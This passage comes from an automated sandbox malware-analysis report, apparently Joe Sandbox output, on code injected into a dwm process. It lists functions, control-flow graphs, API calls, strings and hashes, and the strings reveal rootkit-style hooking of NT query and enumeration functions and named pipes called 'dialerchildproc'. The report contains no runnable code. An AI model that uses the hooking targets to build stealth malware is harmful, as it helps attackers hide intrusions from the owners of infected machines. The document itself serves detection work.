                                                                                  • Part of subcall function 000001160CBE1628: RegOpenKeyExW.ADVAPI32 ref: 000001160CBE17CA
                                                                                • Sleep.KERNEL32 ref: 000001160CBE1AD7
                                                                                • SleepEx.KERNELBASE ref: 000001160CBE1ADD
                                                                                  • Part of subcall function 000001160CBE1628: RegCloseKey.ADVAPI32 ref: 000001160CBE17E5
                                                                                  • Part of subcall function 000001160CBE1628: RegOpenKeyExW.ADVAPI32 ref: 000001160CBE1805
                                                                                  • Part of subcall function 000001160CBE1628: RegCloseKey.ADVAPI32 ref: 000001160CBE1820
                                                                                  • Part of subcall function 000001160CBE1628: RegOpenKeyExW.ADVAPI32 ref: 000001160CBE1840
                                                                                  • Part of subcall function 000001160CBE1628: RegCloseKey.ADVAPI32 ref: 000001160CBE185B
                                                                                  • Part of subcall function 000001160CBE1628: RegOpenKeyExW.ADVAPI32 ref: 000001160CBE187B
                                                                                  • Part of subcall function 000001160CBE1628: RegCloseKey.ADVAPI32 ref: 000001160CBE1896
                                                                                  • Part of subcall function 000001160CBE1628: RegCloseKey.ADVAPI32 ref: 000001160CBE18A0
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1534210851-0
                                                                                • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction ID: 4d05f47bd48a93094164b4b7e942f50d2a5613aedc5ce409dc6bb53def4e775c
                                                                                • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction Fuzzy Hash: B131BA71601F4141FB58AB7ADA412ED23A5AB4CFC4F2454E1AF098B6AFFF36C851E210

                                                                                Non-executed Functions

                                                                                Function 000001160CBE2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 575 1160cbe2b2c-1160cbe2ba5 call 1160cc02ce0 578 1160cbe2ee0-1160cbe2f03 575->578 579 1160cbe2bab-1160cbe2bb1 575->579 579->578 580 1160cbe2bb7-1160cbe2bba 579->580 580->578 581 1160cbe2bc0-1160cbe2bc3 580->581 581->578 582 1160cbe2bc9-1160cbe2bd9 GetModuleHandleA 581->582 583 1160cbe2bed 582->583 584 1160cbe2bdb-1160cbe2beb call 1160cbf6090 582->584 585 1160cbe2bf0-1160cbe2c0e 583->585 584->585 585->578 589 1160cbe2c14-1160cbe2c33 StrCmpNIW 585->589 589->578 590 1160cbe2c39-1160cbe2c3d 589->590 590->578 591 1160cbe2c43-1160cbe2c4d 590->591 591->578 592 1160cbe2c53-1160cbe2c5a 591->592 592->578 593 1160cbe2c60-1160cbe2c73 592->593 594 1160cbe2c75-1160cbe2c81 593->594 595 1160cbe2c83 593->595 596 1160cbe2c86-1160cbe2c8a 594->596 595->596 597 1160cbe2c8c-1160cbe2c98 596->597 598 1160cbe2c9a 596->598 599 1160cbe2c9d-1160cbe2ca7 597->599 598->599 600 1160cbe2d9d-1160cbe2da1 599->600 601 1160cbe2cad-1160cbe2cb0 599->601 602 1160cbe2ed2-1160cbe2eda 600->602 603 1160cbe2da7-1160cbe2daa 600->603 604 1160cbe2cc2-1160cbe2ccc 601->604 605 1160cbe2cb2-1160cbe2cbf call 1160cbe199c 601->605 602->578 602->593 609 1160cbe2dac-1160cbe2db8 call 1160cbe199c 603->609 610 1160cbe2dbb-1160cbe2dc5 603->610 607 1160cbe2d00-1160cbe2d0a 604->607 608 1160cbe2cce-1160cbe2cdb 604->608 605->604 613 1160cbe2d0c-1160cbe2d19 607->613 614 1160cbe2d3a-1160cbe2d3d 607->614 608->607 612 1160cbe2cdd-1160cbe2cea 608->612 609->610 616 1160cbe2df5-1160cbe2df8 610->616 617 1160cbe2dc7-1160cbe2dd4 610->617 621 1160cbe2ced-1160cbe2cf3 612->621 613->614 622 1160cbe2d1b-1160cbe2d28 613->622 623 1160cbe2d3f-1160cbe2d49 call 1160cbe1bbc 614->623 624 1160cbe2d4b-1160cbe2d58 lstrlenW 614->624 619 1160cbe2e05-1160cbe2e12 lstrlenW 616->619 620 1160cbe2dfa-1160cbe2e03 call 1160cbe1bbc 616->620 617->616 618 1160cbe2dd6-1160cbe2de3 617->618 626 1160cbe2de6-1160cbe2dec 618->626 632 1160cbe2e14-1160cbe2e1e 619->632 633 1160cbe2e35-1160cbe2e3f call 1160cbe3844 619->633 620->619 637 1160cbe2e4a-1160cbe2e55 620->637 630 1160cbe2d93-1160cbe2d98 621->630 631 1160cbe2cf9-1160cbe2cfe 621->631 634 1160cbe2d2b-1160cbe2d31 622->634 623->624 623->630 627 1160cbe2d5a-1160cbe2d64 624->627 628 1160cbe2d7b-1160cbe2d8d call 1160cbe3844 624->628 636 1160cbe2dee-1160cbe2df3 626->636 626->637 627->628 638 1160cbe2d66-1160cbe2d79 call 1160cbe152c 627->638 628->630 641 1160cbe2e42-1160cbe2e44 628->641 630->641 631->607 631->621 632->633 642 1160cbe2e20-1160cbe2e33 call 1160cbe152c 632->642 633->641 634->630 643 1160cbe2d33-1160cbe2d38 634->643 636->616 636->626 646 1160cbe2ecc-1160cbe2ed0 637->646 647 1160cbe2e57-1160cbe2e5b 637->647 638->628 638->630 641->602 641->637 642->633 642->637 643->614 643->634 646->602 652 1160cbe2e63-1160cbe2e7d call 1160cbe85c0 647->652 653 1160cbe2e5d-1160cbe2e61 647->653 656 1160cbe2e80-1160cbe2e83 652->656 653->652 653->656 659 1160cbe2e85-1160cbe2ea3 call 1160cbe85c0 656->659 660 1160cbe2ea6-1160cbe2ea9 656->660 659->660 660->646 662 1160cbe2eab-1160cbe2ec9 call 1160cbe85c0 660->662 662->646
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                • API String ID: 2119608203-3850299575
                                                                                • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                • Instruction ID: c707166a0a917046ebf7e864e7a4e84195229765a0eaebd405d71a458f135471
                                                                                • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                • Instruction Fuzzy Hash: BDB15976210F6086EB6C8F25D4407E963A9F748F84F549096FF0953B98EB76CC40E341
                                                                                Function 000001160CBE7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 3140674995-0
                                                                                • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                • Instruction ID: d24682c49f3cba86a42b6dd37d32561b84aec9e9ec0b9faacc2435d91fa56541
                                                                                • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                • Instruction Fuzzy Hash: 2B318176205F808AEB64DF64E8807EE7364F788B44F44406AEB4E57B98EF39C649D710
                                                                                Function 000001160CBED2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 1239891234-0
                                                                                • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                • Instruction ID: 7aee568606479a74cb3337d4d952b70ed198d4533eb6cf8013ee66e46d93c2e5
                                                                                • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                • Instruction Fuzzy Hash: E8315B36214F808AEB648F29E8403DE73A0F789B54F5001A6FB9D43B98EF79C556CB00
                                                                                Function 000001160CBE12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                • String ID: d
                                                                                • API String ID: 2005889112-2564639436
                                                                                • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                • Instruction ID: 5f70c4fa48b0520805612a64c9f863e6a41a39741125622862ed31b17deb92bb
                                                                                • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                • Instruction Fuzzy Hash: 02514976240F848AEB58CF66E4483DA77A1F788F89F144164EF4A07759EF3AC14ADB00
                                                                                Function 000001160CBE1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                • API String ID: 4175298099-1975688563
                                                                                • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                • Instruction ID: 5a8c6f9e0e0a0ca570b123c31ed6b425557668f1b520d46c7c4e0651d0e9f3d8
                                                                                • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                • Instruction Fuzzy Hash: D33195B8540F4AA4FE0DEFA9E8557D46324B70CB44F9050D3F6094266EEF7A824EE391
                                                                                Function 000001160CBB6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 417 1160cbb6910-1160cbb6916 418 1160cbb6951-1160cbb695b 417->418 419 1160cbb6918-1160cbb691b 417->419 420 1160cbb6a78-1160cbb6a8d 418->420 421 1160cbb6945-1160cbb6984 call 1160cbb6fc0 419->421 422 1160cbb691d-1160cbb6920 419->422 426 1160cbb6a8f 420->426 427 1160cbb6a9c-1160cbb6ab6 call 1160cbb6e54 420->427 439 1160cbb6a52 421->439 440 1160cbb698a-1160cbb699f call 1160cbb6e54 421->440 424 1160cbb6922-1160cbb6925 422->424 425 1160cbb6938 __scrt_dllmain_crt_thread_attach 422->425 430 1160cbb6931-1160cbb6936 call 1160cbb6f04 424->430 431 1160cbb6927-1160cbb6930 424->431 428 1160cbb693d-1160cbb6944 425->428 432 1160cbb6a91-1160cbb6a9b 426->432 437 1160cbb6aef-1160cbb6b20 call 1160cbb7190 427->437 438 1160cbb6ab8-1160cbb6aed call 1160cbb6f7c call 1160cbb6e1c call 1160cbb7318 call 1160cbb7130 call 1160cbb7154 call 1160cbb6fac 427->438 430->428 449 1160cbb6b31-1160cbb6b37 437->449 450 1160cbb6b22-1160cbb6b28 437->450 438->432 443 1160cbb6a54-1160cbb6a69 439->443 452 1160cbb69a5-1160cbb69b6 call 1160cbb6ec4 440->452 453 1160cbb6a6a-1160cbb6a77 call 1160cbb7190 440->453 455 1160cbb6b7e-1160cbb6b94 call 1160cbb268c 449->455 456 1160cbb6b39-1160cbb6b43 449->456 450->449 454 1160cbb6b2a-1160cbb6b2c 450->454 470 1160cbb69b8-1160cbb69dc call 1160cbb72dc call 1160cbb6e0c call 1160cbb6e38 call 1160cbbac0c 452->470 471 1160cbb6a07-1160cbb6a11 call 1160cbb7130 452->471 453->420 460 1160cbb6c1f-1160cbb6c2c 454->460 478 1160cbb6b96-1160cbb6b98 455->478 479 1160cbb6bcc-1160cbb6bce 455->479 461 1160cbb6b4f-1160cbb6b5d call 1160cbc5780 456->461 462 1160cbb6b45-1160cbb6b4d 456->462 467 1160cbb6b63-1160cbb6b78 call 1160cbb6910 461->467 482 1160cbb6c15-1160cbb6c1d 461->482 462->467 467->455 467->482 470->471 520 1160cbb69de-1160cbb69e5 __scrt_dllmain_after_initialize_c 470->520 471->439 492 1160cbb6a13-1160cbb6a1f call 1160cbb7180 471->492 478->479 487 1160cbb6b9a-1160cbb6bbc call 1160cbb268c call 1160cbb6a78 478->487 480 1160cbb6bd0-1160cbb6bd3 479->480 481 1160cbb6bd5-1160cbb6bea call 1160cbb6910 479->481 480->481 480->482 481->482 501 1160cbb6bec-1160cbb6bf6 481->501 482->460 487->479 513 1160cbb6bbe-1160cbb6bc6 call 1160cbc5780 487->513 509 1160cbb6a21-1160cbb6a2b call 1160cbb7098 492->509 510 1160cbb6a45-1160cbb6a50 492->510 506 1160cbb6c01-1160cbb6c11 call 1160cbc5780 501->506 507 1160cbb6bf8-1160cbb6bff 501->507 506->482 507->482 509->510 519 1160cbb6a2d-1160cbb6a3b 509->519 510->443 513->479 519->510 520->471 521 1160cbb69e7-1160cbb6a04 call 1160cbbabc8 520->521 521->471
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337600267.000001160CBB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbb0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                                • API String ID: 190073905-1786718095
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: 9f0ed69cfe1bf671b7887ee88bd02b42f551630c69fb0bbdfeeb5c4c92742149
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: C881D131600F0186FB6CAB6594C13D963A0EB8D780F5484A5BB498779EEFBBCC45B710
                                                                                Function 000001160CBECE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetLastError.KERNEL32 ref: 000001160CBECE37
                                                                                • FlsGetValue.KERNEL32(?,?,?,000001160CBF0A6B,?,?,?,000001160CBF045C,?,?,?,000001160CBEC84F), ref: 000001160CBECE4C
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001160CBF0A6B,?,?,?,000001160CBF045C,?,?,?,000001160CBEC84F), ref: 000001160CBECE6D
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001160CBF0A6B,?,?,?,000001160CBF045C,?,?,?,000001160CBEC84F), ref: 000001160CBECE9A
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001160CBF0A6B,?,?,?,000001160CBF045C,?,?,?,000001160CBEC84F), ref: 000001160CBECEAB
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001160CBF0A6B,?,?,?,000001160CBF045C,?,?,?,000001160CBEC84F), ref: 000001160CBECEBC
                                                                                • SetLastError.KERNEL32 ref: 000001160CBECED7
                                                                                • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001160CBF0A6B,?,?,?,000001160CBF045C,?,?,?,000001160CBEC84F), ref: 000001160CBECF0D
                                                                                • FlsSetValue.KERNEL32(?,?,00000001,000001160CBEECCC,?,?,?,?,000001160CBEBF9F,?,?,?,?,?,000001160CBE7AB0), ref: 000001160CBECF2C
                                                                                  • Part of subcall function 000001160CBED6CC: HeapAlloc.KERNEL32 ref: 000001160CBED721
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001160CBF0A6B,?,?,?,000001160CBF045C,?,?,?,000001160CBEC84F), ref: 000001160CBECF54
                                                                                  • Part of subcall function 000001160CBED744: HeapFree.KERNEL32 ref: 000001160CBED75A
                                                                                  • Part of subcall function 000001160CBED744: GetLastError.KERNEL32 ref: 000001160CBED764
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001160CBF0A6B,?,?,?,000001160CBF045C,?,?,?,000001160CBEC84F), ref: 000001160CBECF65
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001160CBF0A6B,?,?,?,000001160CBF045C,?,?,?,000001160CBEC84F), ref: 000001160CBECF76
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 570795689-0
                                                                                • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction ID: 270f405e5c34fdd1e798ad4c0d4d417a63158c46344a50caa6079db8c82e2f10
                                                                                • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction Fuzzy Hash: 1A416D70201B4446FA6CA77195513F966825B9CFB4F2847E4BB36066EEFF2B9841B200
                                                                                Function 000001160CBE2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                • API String ID: 2171963597-1373409510
                                                                                • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction ID: 203282c07502a21eae00c1374ca36f7610a09297222327690334813e59da226b
                                                                                • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction Fuzzy Hash: 6421387A614B4086FB288B25E4487DA67A4F789BA4F600255FB5902BA8DF3DC14ADB00
                                                                                Function 000001160CBB9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337600267.000001160CBB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbb0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction ID: bb8e69615e03b31d6a737a608a43597c408f3e8ca5254f0f8d71d187ae6dbc85
                                                                                • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction Fuzzy Hash: BDE19872A04B808AEB689F65D4C03DD77B4F789B88F100156FF8957B9ACBB6D091E700
                                                                                Function 000001160CBEA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                • Instruction ID: 6bc3ea82e8a8577f5158a409ef7d5aa9ea2377159b5f4a00c64b7a5545bf4ddc
                                                                                • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                • Instruction Fuzzy Hash: 40E18D72A04B808AEB28DF65D4803DD7BA4F759F98F100196FF8957B99EB35C485E700
                                                                                Function 000001160CBEF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeLibraryProc
                                                                                • String ID: api-ms-$ext-ms-
                                                                                • API String ID: 3013587201-537541572
                                                                                • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                • Instruction ID: a399a4a14c3a9ace11e47a6ded76f059a603b02c76fd1e926996d450102628d7
                                                                                • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                • Instruction Fuzzy Hash: 4141C472311F0045FA1ECBA6A8007E563A5B74DFA0F1941A5BF0A8778DFF3AC546A304
                                                                                Function 000001160CBE104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                • String ID: d
                                                                                • API String ID: 3743429067-2564639436
                                                                                • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction ID: 862c031dbf3a4e5d40b547c13d930746b696f540b51dc2ef6ec12241561ce9ef
                                                                                • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction Fuzzy Hash: 76413676254F848AE764CF25E4447DE77A1F388B98F148169EB8907B58EF39C589CB00
                                                                                Function 000001160CBED068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FlsGetValue.KERNEL32(?,?,?,000001160CBEC7DE,?,?,?,?,?,?,?,?,000001160CBECF9D,?,?,00000001), ref: 000001160CBED087
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001160CBEC7DE,?,?,?,?,?,?,?,?,000001160CBECF9D,?,?,00000001), ref: 000001160CBED0A6
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001160CBEC7DE,?,?,?,?,?,?,?,?,000001160CBECF9D,?,?,00000001), ref: 000001160CBED0CE
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001160CBEC7DE,?,?,?,?,?,?,?,?,000001160CBECF9D,?,?,00000001), ref: 000001160CBED0DF
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001160CBEC7DE,?,?,?,?,?,?,?,?,000001160CBECF9D,?,?,00000001), ref: 000001160CBED0F0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Value
                                                                                • String ID: 1%$Y%
                                                                                • API String ID: 3702945584-1395475152
                                                                                • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction ID: d4f570e5741af3305a589a5d584869b16596f25287cc0625df4202b5dceca7f7
                                                                                • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction Fuzzy Hash: 78119370700B4446FA6CA77595513F962455B4CBF0F2843E4BB3A466DEFFABC802B200
                                                                                Function 000001160CBE7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 190073905-0
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: 807ee3d9a8e09dcff49c28744cb6e6743e67fc826685864635c3d8321f605f19
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: C081C171610F018AFA5CAB6AA4413D963D0AB5DF84F1484D5FB05A779EFF3BC846A700
                                                                                Function 000001160CBE9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                • String ID: api-ms-
                                                                                • API String ID: 2559590344-2084034818
                                                                                • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                • Instruction ID: ee6e919353f53969156d5f988679b3d41b25326c60cb110f8e4a7beea7a4d70f
                                                                                • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                • Instruction Fuzzy Hash: FF31C431612F40D5EE29DB52A4407E52398B74CFA0F5909A5BF2E07799FF3AC54DA300
